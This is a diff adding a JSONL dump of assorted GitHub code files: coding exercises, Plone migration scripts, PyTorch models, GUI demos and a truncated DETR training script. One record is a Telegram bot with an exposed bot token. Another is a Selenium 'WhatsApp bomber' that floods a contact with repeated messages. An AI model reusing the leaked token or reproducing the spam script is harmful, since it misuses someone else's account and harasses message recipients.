diff --git "a/2530.jsonl" "b/2530.jsonl" new file mode 100644--- /dev/null +++ "b/2530.jsonl" @@ -0,0 +1,262 @@ +{"seq_id":"73870006615","text":"# https://leetcode.com/problems/special-positions-in-a-binary-matrix/\nfrom typing import List\nimport unittest\n\n__unittest = True\n\n\nclass Solution:\n def numSpecial(self, mat: List[List[int]]) -> int:\n row = [0] * len(mat)\n col = [0] * len(mat[0])\n\n for i in range(len(mat)):\n for j in range(len(mat[0])):\n if mat[i][j] == 1:\n row[i] += 1\n col[j] += 1\n\n cnt = 0\n for i in range(len(mat)):\n for j in range(len(mat[0])):\n if mat[i][j] == 1 and row[i] == 1 and col[j] == 1:\n cnt += 1\n\n return cnt\n\n\nclass Test(unittest.TestCase):\n def helper(self, mat: List[List[int]], want: int):\n solution = Solution()\n got = solution.numSpecial(mat)\n self.assertEqual(got, want)\n\n def test_A1(self):\n self.helper(\n mat=[\n [1, 0, 0],\n [0, 0, 1],\n [1, 0, 0],\n ],\n want=1,\n )\n\n def test_B1(self):\n self.helper(\n mat=[\n [1, 0, 0],\n [0, 1, 0],\n [0, 0, 1],\n ],\n want=3,\n )\n\n def test_C1(self):\n self.helper(\n mat=[\n [1, 0, 1],\n [0, 0, 0],\n [0, 1, 0],\n ],\n want=1,\n )\n\n def test_D1(self):\n self.helper(\n mat=[\n [1, 0, 0, 0],\n [0, 0, 1, 1],\n [1, 0, 0, 0],\n ],\n want=0,\n )\n\n def test_E1(self):\n self.helper(\n mat=[\n [1, 0, 0],\n [0, 0, 1],\n [1, 0, 0],\n [0, 0, 0],\n ],\n want=1,\n )\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"m00p1ng/leetcode","sub_path":"solutions/1582 - Special Positions in a Binary Matrix.py","file_name":"1582 - Special Positions in a Binary Matrix.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"27478222589","text":"# -*- coding: utf-8 -*-\n\nimport sys\nfrom imio.pyutils.system import verbose, error\nimport transaction\nfrom plone import api\n\n# Parameters check\nif len(sys.argv) < 3 or sys.argv[2] != 'run-scripts.py':\n error(\"Inconsistent or unexpected args len: %s\" % sys.argv)\n sys.exit(0)\n\n\ndef script2():\n verbose('Updating ports on %s' % obj.absolute_url_path())\n from collective.documentgenerator.utils import update_oo_config\n #from imio.dms.mail.utils import update_solr_config\n #update_solr_config()\n update_oo_config()\n transaction.commit()\n\n\ndef script1():\n verbose('Pst budget correction on %s' % obj.absolute_url_path())\n catalog = obj.portal_catalog\n from imio.project.core.events import onModifyProject\n for brain in catalog(portal_type='projectspace'):\n ps = brain.getObject()\n verbose(ps.absolute_url())\n ret = ps.restrictedTraverse('clean_budget/display')()\n verbose(\"Before: {}\".format(ret.split('
\\n')[0]))\n ps.restrictedTraverse('clean_budget/delete')(empty_budget=False)\n path = brain.getPath()\n pt = ('pstaction', 'operationalobjective', 'strategicobjective')\n for brain in catalog(portal_type=pt, path=path, sort_on='path'):\n onModifyProject(brain.getObject(), None)\n ret = ps.restrictedTraverse('clean_budget/display')()\n verbose(\"After : {}\".format(ret.split('
\\n')[0]))\n transaction.commit()\n\n\ninfo = [\"You can pass following parameters (with the first one always script number):\", \"1: various\"]\n\nscripts = {'1': script1, '2': script2}\n\nif len(sys.argv) < 4 or sys.argv[3] not in scripts:\n error(\"Bad script parameter\")\n verbose('\\n>> =>'.join(info))\n sys.exit(0)\n\nwith api.env.adopt_user(username='admin'):\n scripts[sys.argv[3]]()\n\n### OLD scripts ###\n\n\ndef script1_1():\n verbose('Pst archive migrations on %s' % obj.absolute_url_path())\n from imio.project.pst.interfaces import IImioPSTProject\n from zope.interface import alsoProvides\n # consider modified schema for projectspace\n obj.portal_setup.runImportStepFromProfile('imio.project.core:default', 'typeinfo', run_dependencies=False)\n verbose('Typeinfo updated')\n # set marker interface\n catalog = obj.portal_catalog\n for brain in catalog(portal_type='projectspace'):\n ps = brain.getObject()\n alsoProvides(ps, IImioPSTProject)\n if not ps.budget_years:\n ps.budget_years = [2013, 2014, 2015, 2016, 2017, 2018]\n ps.manage_addLocalRoles(\"pst_editors\", ('Reader', 'Editor', 'Reviewer', 'Contributor', ))\n ps.reindexObject()\n ps.reindexObjectSecurity()\n verbose('Pstproject: marker added, years added, localroles added')\n # add archive action\n obj.portal_setup.runImportStepFromProfile('imio.project.pst:default', 'actions', run_dependencies=False)\n verbose('Actions updated')\n # update dexterity type local roles\n from plone.dexterity.interfaces import IDexterityFTI\n from zope.component import getUtility\n fti = getUtility(IDexterityFTI, name='projectspace')\n lr = getattr(fti, 'localroles')\n lrsc = lr['static_config']\n if 'internally_published' in lrsc and 'pst_editors' in lrsc['internally_published']:\n del(lrsc['internally_published']['pst_editors'])\n lr._p_changed = True\n verbose('Dexterity local roles removed')\n\n\ndef script1_2():\n verbose('Pst migration on %s' % obj.absolute_url_path())\n catalog = obj.portal_catalog\n for brain in catalog(portal_type='projectspace'):\n ps = brain.getObject()\n ps.manage_addLocalRoles(\"pst_editors\", ('Reader', 'Editor', 'Reviewer', 'Contributor', ))\n ps.reindexObject()\n ps.reindexObjectSecurity()\n\n\ndef script1_3():\n verbose('Pst dashboards migration on %s' % obj.absolute_url_path())\n catalog = obj.portal_catalog\n from collective.eeafaceted.collectionwidget.utils import _updateDefaultCollectionFor\n from imio.project.pst import add_path\n for brain in catalog(portal_type='projectspace'):\n ps = brain.getObject()\n if 'operationalobjectives' not in ps:\n continue\n folder = ps['operationalobjectives']\n xmlpath = add_path('faceted_conf/operationalobjective.xml')\n folder.unrestrictedTraverse('@@faceted_exportimport').import_xml(import_file=open(xmlpath))\n _updateDefaultCollectionFor(folder, folder['all'].UID())\n obj.portal_setup.runImportStepFromProfile('imio.project.core:default', 'viewlets', run_dependencies=False)\n transaction.commit()\n","repo_name":"IMIO/server.project","sub_path":"run-scripts.py","file_name":"run-scripts.py","file_ext":"py","file_size_in_byte":4533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"31204090545","text":"import torch\nimport torch.nn.functional as F\nimport torch.nn as nn\n\ndef MC_dropout(act_vec, p=0.5, mask=True, inplace=True):\n return F.dropout(act_vec, p=p, training=mask, inplace=inplace)\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, in_planes, planes, stride=1, pdrop=0.1):\n 
super(BasicBlock, self).__init__()\n self.pdrop = pdrop\n self.conv1 = nn.Conv2d(\n in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3,\n stride=1, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion*planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion*planes,\n kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion*planes)\n )\n\n def forward(self, x, sample=True):\n mask = self.training or sample # if training or sampling, apply random binary mask\n\n out = F.relu(self.bn1(self.conv1(x)))\n out = MC_dropout(out, p=self.pdrop, mask=mask, inplace=False)\n out = self.bn2(self.conv2(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, in_planes, planes, stride=1, pdrop=0.1):\n super(Bottleneck, self).__init__()\n self.pdrop = pdrop\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3,\n stride=stride, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, self.expansion *\n planes, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(self.expansion*planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion*planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion*planes,\n kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion*planes)\n )\n\n def forward(self, x, sample=True):\n mask = self.training or sample # if training or sampling, apply random binary mask\n\n out = F.relu(self.bn1(self.conv1(x)))\n out = MC_dropout(out, p=self.pdrop, mask=mask, inplace=False)\n out = F.relu(self.bn2(self.conv2(out)))\n out = MC_dropout(out, p=self.pdrop, mask=mask, inplace=False)\n out = self.bn3(self.conv3(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\nclass ResNet(nn.Module):\n def __init__(self, block, num_blocks, num_classes=10, input_size=32, pdrop=0.1):\n super(ResNet, self).__init__()\n self.in_planes = 64\n self.pdrop = pdrop\n self.out_channels = num_classes\n \n #adapt first conv layer to image size\n if input_size > 32:\n self.conv1 = nn.Conv2d(3, 64, kernel_size=5, stride=1, padding=3, bias=False)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n else: #classic cifar10 case\n self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=1, padding=1)\n self.bn1 = nn.BatchNorm2d(64)\n self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)\n self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)\n self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)\n self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)\n self.linear = nn.Linear(512*block.expansion, num_classes)\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1]*(num_blocks-1)\n layers = []\n for stride in strides:\n layers.append(block(self.in_planes, planes, stride, self.pdrop))\n self.in_planes = planes * block.expansion\n return nn.Sequential(*layers)\n\n def forward(self, x, sample=True):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.maxpool(out) #added to adapt to input sizes\n out = 
self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = self.layer4(out)\n out = F.avg_pool2d(out, 4)\n out = out.view(out.size(0), -1)\n out = self.linear(out)\n return out\n \n def sample_predict(self, x, Nsamples):\n # Just copies type from x, initializes new vector\n logits = x.data.new(Nsamples, x.shape[0], self.out_channels)\n\n for i in range(Nsamples):\n y = self.forward(x, sample=True)\n logits[i] = y\n\n return logits\n\ndef ResNet34(num_classes, input_size, pdrop):\n return ResNet(BasicBlock, [3, 4, 6, 3], num_classes, input_size, pdrop)\n\ndef ResNet50(num_classes, input_size, pdrop):\n return ResNet(Bottleneck, [3, 4, 6, 3], num_classes, input_size, pdrop)","repo_name":"theresabruns/UncertaintyEstimation","sub_path":"MCDropout/src/MC_dropout/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":5272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14243264005","text":"from taipy.gui import Gui, State, broadcast_callback\nfrom threading import Thread, Event\nfrom time import sleep\n\ncounter = 0\n\n# Thread management\nthread = None\nthread_event = Event()\ntimer_status = \"Timer stopped\"\n\nclient_index = 1\nuser_name = \"\"\nbutton_texts = [\"Start\", \"Stop\"]\n# Text in the start/stop button (initially \"Start\")\nbutton_text = button_texts[0]\n\n\ndef on_init(state: State):\n global client_index\n state.user_name = f\"Client_{client_index}\"\n client_index = client_index+1\n\n# Invoked by the timer\ndef update_counter(state: State, c):\n # Update all clients\n state.broadcast(\"counter\", c)\n\ndef count(event, gui):\n while not event.is_set():\n global counter\n counter = counter + 1\n broadcast_callback(gui, update_counter, [counter])\n sleep(2)\n\n\n# Start or stop the timer when the button is pressed\ndef start_or_stop(state):\n status = \"\"\n global thread\n if thread: # Timer is running\n thread_event.set()\n thread = None\n status = \"stopped\"\n else: # Timer is stopped\n thread_event.clear()\n thread = Thread(target=count, args=[thread_event, state.get_gui()])\n thread.start()\n status = \"started\"\n # Update statuses.\n with state:\n state.broadcast(\"timer_status\", f\"Timer {status} by {state.user_name}\")\n state.timer_status = f\"You {status} the timer\"\n state.button_text = button_texts[1 if thread else 0]\n\n\npage = \"\"\"# Broadcasting values\n\nUser name: <|{user_name}|input|>\n\n<|{timer_status}|>\n\nCounter: <|{counter}|>\n\nTimer: <|{button_text}|button|on_action=start_or_stop|>\n\"\"\"\n\n# Declare \"button_text\" as a shared variable.\n# Assigning a value to a state's 'button_text' property is propagated to all clients\nGui.add_shared_variable(\"button_text\")\n\nGui(page).run()\n","repo_name":"FlorianJacta/basic-demo","sub_path":"gui/advanced_features/broadcast.py","file_name":"broadcast.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28637163360","text":"from transliterate import to_cyrillic, to_latin\nimport telebot\n\nbot = telebot.TeleBot(\"2070189183:AAF7vhot4tA71lQ0qdU1Z9IkNpiOrxGtk9U\", parse_mode=None)\n\n@bot.message_handler(commands=['start'])\ndef send_welcome(message):\n bot.reply_to(message, \"Matn kiriting \")\n\n@bot.message_handler(func=lambda message: True)\ndef echo_all(message):\n msg = message.text\n javob = lambda msg: to_cyrillic(msg) if msg.isascii() else to_latin(msg)\n bot.reply_to(message, 
javob(msg))\n\nbot.polling()\n\nmatn = input(\">>>\")\n","repo_name":"bakhritdinov99/python-javoblar","sub_path":"27-dars. Kirill-Lotin bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29679602923","text":"import os.path\nimport os.path\nimport sys\nfrom abc import abstractmethod\nfrom typing import List\n\nfrom PyQt5.QtCore import Qt, QSize\nfrom PyQt5.QtWidgets import QLabel, QPushButton, QVBoxLayout, QStackedWidget, QToolButton, QListWidget, QApplication, \\\n QHBoxLayout\n\nfrom bean.beans import SocialConfig, AppTypeToName\nfrom util import log, app_download_info\nfrom util.tools import UITool\nfrom widget.base_widget import BaseWidget\nfrom widget.custom_msgbox import CustomMsgBox\nfrom widget.layout_widget import HBoxLayoutWidget, VBoxLayoutWidget\n\n\nclass BaseSettingsWidget(BaseWidget):\n def __init__(self):\n from settings.settings_controller import SettingsController\n super(BaseSettingsWidget, self).__init__()\n self.controller = SettingsController(self)\n\n @abstractmethod\n def __initView(self):\n pass\n\n @abstractmethod\n def __getQss(self) -> [dict, None]:\n pass\n\n def showOnFilePathChange(self, path: str, typ: int):\n log.i(path, typ)\n CustomMsgBox.showToast(\"修改成功\")\n\n\nclass SettingsWidget(BaseSettingsWidget):\n def __init__(self):\n super(SettingsWidget, self).__init__()\n\n self.labelTitle = QLabel(\"系统设置\")\n self.btnClose = QPushButton()\n\n self.btnCommonSettings = QPushButton(\"通用配置\")\n self.btnSocialSettings = QPushButton(\"社交平台配置\")\n self.btnSettingsList = [self.btnCommonSettings, self.btnSocialSettings]\n\n self.stackedWidget = QStackedWidget()\n\n self.__initView()\n\n self.__onPageBtnClicked(0)\n\n def __getQss(self) -> [dict, None]:\n qssBtn = \"QPushButton {font-size:17px; \" \\\n \"color:#636b71; \" \\\n \"border:none;background-color:transparent;\" \\\n \"text-align:left; \" \\\n \"padding-left:15px }\" \\\n \"QPushButton:checked {background-color:#d8eaf6; border:0px; border-left:2px solid #007bff; }\"\n return {self: \"background-color:#f4f4f6\",\n self.labelTitle: \"font-size:20px\",\n self.btnClose: \"border:none\",\n self.btnCommonSettings: qssBtn,\n self.btnSocialSettings: qssBtn}\n\n def __initView(self):\n UITool.setQss(self.__getQss())\n vBoxRoot = UITool.getLayout(QVBoxLayout(), self)\n self.btnClose.setIcon(UITool.getQIcon(\":/ic_close_gray\", 16, 16))\n self.btnClose.setFixedSize(25, 25)\n\n UITool.setCursor(Qt.PointingHandCursor, self.btnClose, self.btnCommonSettings, self.btnSocialSettings)\n\n for i, btn in enumerate(self.btnSettingsList):\n btn.setFixedSize(165, 45)\n btn.setCheckable(True)\n btn.clicked.connect(lambda state, idx=i: (self.__onPageBtnClicked(idx)))\n\n widgetTitle = HBoxLayoutWidget(margins=(35, 0, 35, 0))\n widgetTitle.layout.addWidget(self.labelTitle)\n widgetTitle.layout.addStretch(1)\n widgetTitle.layout.addWidget(self.btnClose)\n widgetTitle.setFixedHeight(55)\n\n widgetBtn = VBoxLayoutWidget(spacing=15, margins=(0, 30, 25, 0))\n widgetBtn.layout.addWidget(self.btnCommonSettings)\n widgetBtn.layout.addWidget(self.btnSocialSettings)\n widgetBtn.layout.addStretch(1)\n\n widgetContent = HBoxLayoutWidget(margins=(35, 0, 35, 0))\n widgetContent.layout.addWidget(widgetBtn)\n widgetContent.layout.addWidget(UITool.getLineFrame(1, \"#d6d6d8\", False))\n widgetContent.layout.addWidget(self.stackedWidget, 1)\n\n self.stackedWidget.setContentsMargins(30, 30, 30, 30)\n 
self.stackedWidget.addWidget(CommonSettingsWidget())\n self.stackedWidget.addWidget(SocialSettingsWidget())\n\n vBoxRoot.addWidget(widgetTitle)\n vBoxRoot.addWidget(UITool.getLineFrame(1, \"#d6d6d8\"))\n vBoxRoot.addWidget(widgetContent)\n\n def __onPageBtnClicked(self, index: int):\n for btn in self.btnSettingsList:\n btn.setChecked(False)\n\n self.btnSettingsList[index].setChecked(True)\n self.stackedWidget.setCurrentIndex(index)\n\n\nclass CommonSettingsWidget(BaseSettingsWidget):\n def __init__(self):\n super(CommonSettingsWidget, self).__init__()\n\n self.vBoxRoot: QVBoxLayout = UITool.getLayout(QVBoxLayout(), self, spacing=20)\n self.labelFileStorage = QLabel(\"文件存储\")\n self.labelFilePath = QLabel()\n self.labelDes = QLabel(\"文件默认保存位置\")\n self.btnChange = QPushButton(\"更改\")\n\n self.__initView()\n\n def __getQss(self) -> [dict, None]:\n return {self.labelFileStorage: \"font-size:18px;\",\n self.labelFilePath: \"color:#c0c0c0;\"\n \"border:none;\"\n \"border-bottom:2px solid #b5b5b6;\"\n \"padding-bottom:8px;\"\n \"font-size:18px \",\n self.labelDes: \"color:#c0c0c0; font-size:18px\",\n self.btnChange: \"background-color:#ffffff; \"\n \"border: 1px solid #b5b5b6; \"\n \"border-radius:5px;\"\n \"font-size:15px\"}\n\n def __initView(self):\n UITool.setQss(self.__getQss())\n self.btnChange.setFixedSize(70, 30)\n self.btnChange.clicked.connect(lambda: self.controller.changeFilePath(SocialConfig.DEFAULT))\n\n self.showOnFilePathChange(self.controller.getDefaultFilePath(), SocialConfig.DEFAULT)\n\n self.vBoxRoot.addWidget(self.labelFileStorage)\n self.vBoxRoot.addWidget(self.labelFilePath)\n self.vBoxRoot.addWidget(self.labelDes)\n self.vBoxRoot.addWidget(self.btnChange)\n self.vBoxRoot.addStretch(1)\n\n def showOnFilePathChange(self, path: str, typ: int):\n self.labelFilePath.setText(os.path.expandvars(path))\n\n\nclass SocialSettingsWidget(BaseSettingsWidget):\n def __init__(self):\n super(SocialSettingsWidget, self).__init__()\n self.labelTitle = QLabel(\"平台列表\")\n self.descriptionLabel: QLabel = QLabel()\n self.settings: List[SocialConfig]\n self.__initView()\n\n def __getQss(self) -> [dict, None]:\n return {self: \"QLabel {color:#687176; font-size:20px}\"\n \"QListWidget {background-color:transparent;border:none}\"\n \"QLabel#descriptionLabel {font-size:16px}\"}\n\n def __initView(self):\n UITool.setQss(self.__getQss())\n\n vBox: QVBoxLayout = UITool.getLayout(QVBoxLayout(), self, spacing=20)\n listPlatform: QListWidget = QListWidget()\n self.descriptionLabel.setObjectName(\"descriptionLabel\")\n\n self.settings = self.controller.getSettings()\n\n for i in range(len(self.settings) + 1):\n UITool.addListItem(listPlatform,\n SettingItemWidget(None if i == 0 else self.settings[i - 1], self.controller),\n 40 if i == 0 else 50)\n\n self.__refreshDescriptions()\n\n vBox.addWidget(self.labelTitle)\n vBox.addWidget(listPlatform)\n vBox.addWidget(self.descriptionLabel)\n\n def __refreshDescriptions(self):\n text = \"存储路径: \\n\"\n for socialConfig in self.settings:\n text += f\"{AppTypeToName[socialConfig.type]}: \" \\\n f\"{'默认' if len(socialConfig.path) == 0 else socialConfig.path}\\n\"\n text += \"\\n\"\n text += app_download_info.getDescription()\n self.descriptionLabel.setText(text)\n\n def showOnFilePathChange(self, path: str, typ: int):\n self.settings[typ].path = path\n self.__refreshDescriptions()\n\n\nclass SettingItemWidget(BaseWidget):\n def __init__(self, config: SocialConfig, controller):\n from settings.settings_controller import SettingsController\n super(SettingItemWidget, 
self).__init__()\n self.controller: SettingsController = controller\n self.btnName = QToolButton()\n self.btnStatus = QToolButton()\n self.btnEdit = QPushButton()\n self.labelVersion = QLabel()\n\n self.labelList = []\n\n self.widgetHBox: QHBoxLayout = UITool.getLayout(QHBoxLayout(), self)\n\n self.config = config\n self.__initView()\n\n def __getQss(self) -> [dict, None]:\n return {self: \"QWidget {border-bottom: 1px solid #e1e5ed }\"\n \"QLabel {font-size: 18px }\"\n \"QAbstractButton {border: none;font-size:15px},\",\n self.btnStatus: \"color:#999999;\",\n self.labelVersion: \"background-color:transparent\"}\n\n def __initView(self):\n UITool.setQss(self.__getQss())\n\n if self.config is None:\n widgetList = [QLabel(\"平台名称\"), QLabel(\"状态\"), QLabel(\"存储路径\"), QLabel(\"支持版本\")]\n self.labelList = widgetList\n self.setStyleSheet(\"background-color:#dde3ed; font-size:16px\")\n else:\n nameList = [\"企业微信\", \"微信\", \"QQ\"]\n iconList = [\":/ic_buswechat.png\", \":/ic_wechat.png\", \":/ic_qq.png\"]\n\n self.btnName.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)\n self.btnStatus.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)\n\n UITool.setButtonStyle(self.btnName, QSize(90, 20), text=nameList[self.config.type],\n icon=UITool.getQIcon(iconList[self.config.type], 25, 25))\n\n status = self.config.status\n iconPath = \":/ic_running.png\" if status else \":/ic_not_running.png\"\n UITool.setButtonStyle(self.btnStatus, QSize(70, 20), text=\"已授权\" if status else \"未授权\",\n icon=UITool.getQIcon(iconPath, 10, 10))\n\n self.btnEdit.setIcon(UITool.getQIcon(\":/ic_edit.png\", 16, 16))\n self.btnEdit.clicked.connect(lambda: self.controller.changeFilePath(self.config.type))\n UITool.setCursor(Qt.PointingHandCursor, self.btnEdit, self.labelVersion)\n self.labelVersion.setText(str(self.config.versions))\n self.labelVersion.setOpenExternalLinks(True)\n\n widgetList = [self.btnName, self.btnStatus, self.btnEdit, self.labelVersion]\n\n self.widgetHBox.addWidget(widgetList[0], 150, Qt.AlignCenter)\n lineColor = \"#c2d4e6\" if self.config is None else \"#e1e5ed\"\n self.widgetHBox.addWidget(UITool.getLineFrame(2, lineColor, False))\n self.widgetHBox.addWidget(widgetList[1], 115, Qt.AlignCenter)\n self.widgetHBox.addWidget(UITool.getLineFrame(2, lineColor, False))\n self.widgetHBox.addWidget(widgetList[2], 95, Qt.AlignCenter)\n self.widgetHBox.addWidget(UITool.getLineFrame(2, lineColor, False))\n self.widgetHBox.addWidget(widgetList[3], 270, Qt.AlignCenter)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n w = SettingsWidget()\n w.resize(900, 600)\n w.show()\n\n sys.exit(app.exec_())\n","repo_name":"SailFlorve/DataCollectQt","sub_path":"settings/settings_ui.py","file_name":"settings_ui.py","file_ext":"py","file_size_in_byte":10881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14439429505","text":"# Jordan Leung\r\n# 2/13/2019\r\n\r\n# 5-8 Hello Admin\r\nusernames = ['jjleung', 'nubcake', 'jordanjj8', 'jordanl', 'jjleung88']\r\n#usernames = []\r\n\r\nif usernames:\r\n for username in usernames:\r\n if username == 'jjleung':\r\n print(\"Hello Student, would you like to see your grades?\")\r\n else:\r\n print(\"Hello boob, you have entered old usernames that Jordan used to use...\")\r\nelse:\r\n print(\"Please type in usernames! 
\")\r\n\r\n\r\n# 5-10 checking new usernames\r\ncurrent_users = usernames[:]\r\nnew_users = ['hello', 'singer_babe', 'jordanl', 'guitar_lover', 'jjleung']\r\n\r\nfor user in new_users:\r\n if user in current_users:\r\n print(\"Please replace \" + user + \" and add a new username\")\r\n else:\r\n print(\"Adding username \" + user + \" to the list\")\r\n\r\n\r\n","repo_name":"jordanjj8/exercising_with_python","sub_path":"IF.py","file_name":"IF.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26117381246","text":"import numpy as np\ndata_file = open('out_rep.txt')\ndata_file1 = open('out_UserId.txt')\ndata_rep = data_file.readlines()\ndata_user = data_file1.readlines()\nfor i in range(len(data_rep)) :\n data_rep[i] = list(map(int, data_rep[i].split()))\nfor j in range(len(data_user)):\n data_user[j] = list(map(int, data_user[j].split()))\n\nrep=[]\nnoans=[]\n\nfor i in range(0,len(data_user)):\n for j in range(0,len(data_rep)):\n if data_user[i][0]==data_rep[j][0]:\n rep.append(data_rep[j][1])\n noans.append(data_user[i][1])\n\ncorr=np.corrcoef(rep,noans)\nprint('The correlation coefficient is:',corr[0][1])\n\n\n","repo_name":"HS1VT/datascience.stackexchange-data-analysis","sub_path":"Part5/q5.py","file_name":"q5.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"3568690211","text":"import sklearn\nfrom sklearn import datasets, svm, metrics\nfrom sklearn.neighbors import KNeighborsClassifier\n\n\n# sklearn dataset\ncancer = datasets.load_breast_cancer()\n\n# features and targets\n#print(cancer.feature_names)\n#print(cancer.target_names)\n\nX = cancer.data\nY = cancer.target\n\nx_train, x_test, y_train, y_test = sklearn.model_selection.train_test_split(X, Y, test_size=0.2)\n\n# for making results more readable, i.e. 
0, 1 to malignant, benign\nclasses = ['malignant', 'benign']\n\n# creates classifier (support vector classifier) with a linear kernel and an increased soft margin\nclf = svm.SVC(kernel=\"linear\", C=2)\nclf.fit(x_train, y_train)\n\n# calculates predictions from test data\ny_pred = clf.predict(x_test)\n\n# calculates accuracy of model\nacc = metrics.accuracy_score(y_test, y_pred)\n\nprint(acc)\n\n# compares predictions and actual data\nfor x in range(len(y_pred)):\n print(\"Predicted: \", classes[y_pred[x]], \"Actual:\", classes[y_test[x]])\n","repo_name":"gercokim/ml_basics","sub_path":"SVM/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"11909500704","text":"from selenium import webdriver\n\ndriver = webdriver.Chrome(\"/chromedriver\") # Windows User change path here.\ndriver.get('http://web.whatsapp.com')\n\nname = \" \" # Enter Your Name or Group\nmsg = \" \"# Message in whatsapp to send\ncount = 100 # count Number\n\n\ninput('Enter anything after scanning QR code')\n\nuser = driver.find_element_by_xpath('//span[@title = \"{}\"]'.format(name))\nuser.click()\n\nmsg_box = driver.find_element_by_class_name('_1Plpp')\n\nfor i in range(count):\n msg_box.send_keys(msg)\n driver.find_element_by_class_name('_35EW6').click()\n\n","repo_name":"ranjitkathiriya/Whatsapp_Bomber","sub_path":"bomber.py","file_name":"bomber.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14429672806","text":"import yaml\nimport datetime\nimport random\nimport time\nfrom pathlib import Path\n\nimport numpy as np\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom util.engine import train_one_epoch, valid_one_epoch\nfrom models.detr import build\nfrom util.dataset import selfDataset, collateFunction\n\n\ndef main(cfg):\n device = torch.device(cfg['device'])\n\n # fix the seed for reproducibility\n seed = cfg['seed']\n torch.manual_seed(seed)\n np.random.seed(seed)\n random.seed(seed)\n\n model, criterion = build(cfg)\n model.to(device)\n\n n_parameters = sum(p.numel()\n for p in model.parameters() if p.requires_grad)\n print('number of params:', n_parameters)\n\n param_dicts = [\n {\"params\": [p for n, p in model.named_parameters(\n ) if \"backbone\" not in n and p.requires_grad]},\n {\n \"params\": [p for n, p in model.named_parameters() if \"backbone\" in n and p.requires_grad],\n \"lr\": cfg['lr_backbone'],\n },\n ]\n optimizer = torch.optim.AdamW(param_dicts, lr=cfg['lr'],\n weight_decay=cfg['weight_decay'])\n lr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer, cfg['lr_drop'])\n\n # load data\n dataset = selfDataset(\n cfg['train_dir'], cfg['scaled_width'], cfg['scaled_height'], cfg['num_class'])\n dataLoader = DataLoader(dataset, batch_size=cfg['batch_size'], shuffle=True, collate_fn=collateFunction,\n pin_memory=True, num_workers=cfg['num_workers'])\n dataset_val = selfDataset(\n cfg['val_dir'], cfg['scaled_width'], cfg['scaled_height'], cfg['num_class'])\n dataLoader_val = DataLoader(dataset_val, batch_size=cfg['batch_size'], shuffle=True, collate_fn=collateFunction,\n pin_memory=True, num_workers=cfg['num_workers'])\n # steps = int(dataset.__len__() / cfg['batch_size'])\n\n if cfg['frozen_weights'] is not None:\n checkpoint = torch.load(cfg['frozen_weights'], map_location='cpu')\n model.detr.load_state_dict(checkpoint['model'])\n\n output_dir = 
